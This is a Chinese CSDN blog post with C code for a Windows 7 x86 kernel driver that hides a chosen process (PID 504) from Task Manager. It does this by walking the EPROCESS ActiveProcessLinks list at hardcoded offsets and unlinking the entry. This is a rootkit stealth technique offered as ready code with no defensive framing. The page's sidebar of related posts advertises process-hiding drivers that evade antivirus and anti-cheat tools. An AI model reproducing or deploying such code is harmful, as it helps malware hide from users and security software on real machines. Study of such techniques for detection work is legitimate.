隐藏进程 驱动级 摘链 任务管理器看不到

最新推荐文章于 2024-05-20 10:23:39 发布
最新推荐文章于 2024-05-20 10:23:39 发布
阅读量571 收藏
点赞数
原文链接:https://blog.csdn.net/u012088909/article/details/84571600
版权

闲着蛋疼写来玩玩练练手 没啥技术含量 只是个简单的摘链 任务管理器看不到

测试环境 Win7 x86

typedef struct 
{
    DWORD_PTR    EProcess;
    UCHAR*        ImageName;
    ULONG        ProcessID;
}_Process_Info;
 
NTSTATUS HideProcess()
{
    DWORD_PTR CurrentEProcess = (DWORD_PTR)PsGetCurrentProcess(); // 首先取到自身EPROCESS结构
    // EPROCESS + 0x16c = ImageFileName
    KdPrint(("SpriteDrv: Current Image File Name: %s\n", (UCHAR*)(CurrentEProcess + 0x16c)));
 
    // 取活动进程链表
    // EPROCESS + 0x16c ] + 0xb8 = ActiveProcessLinks
    PLIST_ENTRY pActiveProcessLinks = (LIST_ENTRY*)(CurrentEProcess + 0xb8);
    PLIST_ENTRY pNextPtr = pActiveProcessLinks->Flink;
 
    int count = 0;
    while (pNextPtr->Flink != pActiveProcessLinks->Flink) {
 
        _Process_Info ProcessInfo;
 
        ProcessInfo.EProcess = ((DWORD_PTR)pNextPtr - 0xb8);
        ProcessInfo.ImageName = (UCHAR*)(ProcessInfo.EProcess + 0x16c);
        ProcessInfo.ProcessID = *((ULONG*)(ProcessInfo.EProcess + 0xb4));
        KdPrint(("SpriteDrv: Image File Name: %s\t\t%d\n", ProcessInfo.ImageName, ProcessInfo.ProcessID));
 
        // 因为部分进程取出来的进程名会有问题 (部分没有\0符 也没有在结构里找到长度元素)
        // 所以用PID来判断是否为被隐藏的进程
        if (ProcessInfo.ProcessID == 504) {
            // 摘链操作
            pNextPtr->Blink->Flink = pNextPtr->Flink;
            pNextPtr->Flink->Blink = pNextPtr->Blink;
        }
 
        count++;
        pNextPtr = pNextPtr->Flink;
    }
 
    KdPrint(("SpriteDrv: Process size: %d\n", count));
        
    return STATUS_SUCCESS;
}
 

Shirley068
关注
[驱动] 隐藏进程 驱动 摘链 任务管理器看不到
Sprite雪碧
11-27 1520
闲着蛋疼写来玩玩练练手没啥技术含量只是个简单的摘链任务管理器看不到 测试环境 Win7 x86 typedef struct { DWORD_PTR EProcess; UCHAR* ImageName; ULONG ProcessID; }_Process_Info; NTSTATUS HideProcess() { DWORD_PTR CurrentEProcess...
驱动隐藏进程和文件
09-21
强大的驱动进程隐藏技术,有应用层的相关调用以及GUI,是学习驱动程序的好资料
驱动开发:内核无痕隐藏自身分析
热门推荐
CSDN
10-24 2万+
在笔者前面有一篇文章通过摘除驱动链表实现了断链隐藏自身的目的,但此方法恢复时会触发PG会蓝屏,偶然间在网上找到了一个作者介绍的一种方法,觉得有必要详细分析一下他是如何实现的进程隐藏的,总体来说作者的思路是最终寻找到的入口地址,该函数的作用是将驱动信息加入链表和移除链表,运用这个函数即可动态处理驱动的添加和移除问题。那么如何找到函数入口地址就是下一步的目标,寻找入口可以总结为;搜索可定位到地址。搜索定位到即得到了我们想要的。根据前面枚举篇系列文章,定位这段特征很容易实现,如下是一段参考代码。
驱动隐藏工具
03-23
驱动隐藏工具,杀毒软件都可以欺骗过去,隐藏任何一个东西都可以
win10驱动-隐藏进程稳定不蓝屏技术
hzw320的博客
11-18 3769
支持到了win10 64位系统 , 支持隐藏目标进程(32/64位程序进程),隐藏后,连各种ark驱动工具都看不见我们的驱动隐藏进程隐藏进程呢,在之前很久以前的我们的game-ec 驱动模块usb版里 32位驱动 就有这个功能了 ,基本上按月付费租千元价格的驱动里才有 支持win10 64位系统的驱动隐藏进程。一般学员都知道隐藏进程的作用,但是自从微软系统出了win10 64系统后,但市面上那些驱动隐藏进程的不蓝屏的很少,有的也价格也非常贵,虽然市面上有出现了win10的驱动隐藏进程驱动
驱动进程隐藏-按键精灵过检】驱动,内核进程隐藏进程保护。实战效果演示,免费分享。
最新发布
luoqiaoliang的博客
05-20 2616
废话不多说,干货直接上! 免费的驱动进程隐藏工具分享,还不赶紧带上你的赞和关注白嫖一波吗?
易语言实现任务管理器-易语言
06-12
没事干搞了个任务管理器的源码 其实论坛有很多,相比那些新更新了 取进程的CPU占用率和判断进程是否暂停 可以监视进程创建与退出 以前的取CPU占用率不准了,就从C源码里翻出来的,可能比系统任务管理器中的显示的小...
易语言欺骗任务管理器
11-19
"欺骗任务管理器"在IT领域通常是指通过特定技术手段来隐藏或伪装进程,使得它们在任务管理器中不易被发现或者显示为其他程序,以达到某种目的,如软件防卸载、病毒隐藏等。 任务管理器是Windows操作系统中的一个...
进程隐藏工具
11-03
1. **修改进程列表**: 工具可以修改系统进程列表,不让目标进程出现在任务管理器或其他系统监控工具中。 2. **进程注入**:将隐藏工具的代码注入到其他正在运行的进程中,使得隐藏进程看起来像是被注入进程的一...
可以隐藏任何进程
01-17
隐藏进程是指通过各种方法使进程任务管理器或其他系统工具中不可见,使得用户或安全软件无法发现这些进程的存在。这可能是通过修改系统API,篡改注册表,或者利用系统漏洞来实现的。 2. **防杀技术**:这是指一...
驱动签名 隐藏进程 保护进程 多种方式 保护进程驱动
05-18
多种方法 保护进程 断链 修改Flag hook对象 抹psp表 csscs表 注册回调 ObRegisterCallbacks
驱动隐藏进程
10-17
驱动,对进程隐藏,需要的朋友,可以下载使用。
驱动隐藏进程源代码
06-09
之前在csdn下载的代码,修改了其中的两个bug:1、在有些机器上运行时蓝屏。2、存在内核内存的泄露(通常半天时间后就会死机或自动重启)。 这个是没有完全改好的:( 自己不能编辑资源,所以又上传了一个(驱动隐藏进程源代码2)
驱动进程保护 隐藏 注入
08-04
驱动进程保护 隐藏 注入 W7 W8 W10 32 64位都支持 不蓝屏
驱动隐藏进程
kktlxd的专栏
06-01 2849
FU_rootkit中有很多功能,先看了隐藏进程,,和以前在群里讨论的一样,windows调度的是线程,所以可以把要隐藏进程进程链中去掉,并不影响进程中的线程的调度和运行. FU_rootkit中的方法是先通过PsGetCurrentProcess(),(PsGetCurrentProcess returns a pointer to the process of the current
[Windows 驱动开发] 隐藏进程内存
LYSM
09-01 1614
原理 在进程的 _EPROCESS 中有一个 _RTL_AVL_TREE 类型的 VadRoot 成员,它是一个存放进程内存块的二叉树结构,如果我们找到了这个二叉树中我们想要隐藏的内存,直接将这个内存在二叉树中 “抹去”(其实是让上一个节点的 EndingVpn 指向下个节点的 EndingVpn ,让两个节点融合) 就可以达到隐藏的效果。 过程 比如你在代码中申请了两块内存: int main() { LPVOID p1 = VirtualAlloc(NULL, 0x10000, MEM_CO
windows10驱动 x64--- 驱动实现隐藏任意进程(四)
weixin_41725706的博客
11-10 3539
PsInitialSystemProcess(进程HeadList) --->给出进程名--->0环实现进程隐藏
驱动层SSDT 隐藏进程
ShadowAssassin的专栏
11-27 6535
闲着没事,便想在熟悉下之前看过的驱动编程相关知识,于是就写了这个简单的驱动隐藏进程程序。 要点:  在驱动隐藏,主要还是使用SSDT挂钩的方法,相关知识,可以到网上查找,在隐藏进程时,为了能够隐藏多个进程,在内核代码中创建一个链表,结构如下: //存放要隐藏进程的名字链表 typedef struct _ProcNameLink { UNICODE_STRING ProcName; s
VB代码隐藏与显示任务管理器
最后,提到`Alt+F4`组合键和`ControlBox`的设置,这通常与Windows任务管理器的关闭按钮相关,但具体如何关联到上述禁用/启用操作,文档中并未提供详细说明,可能是指禁用任务管理器后,用户无法通过`Alt+F4`关闭任务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值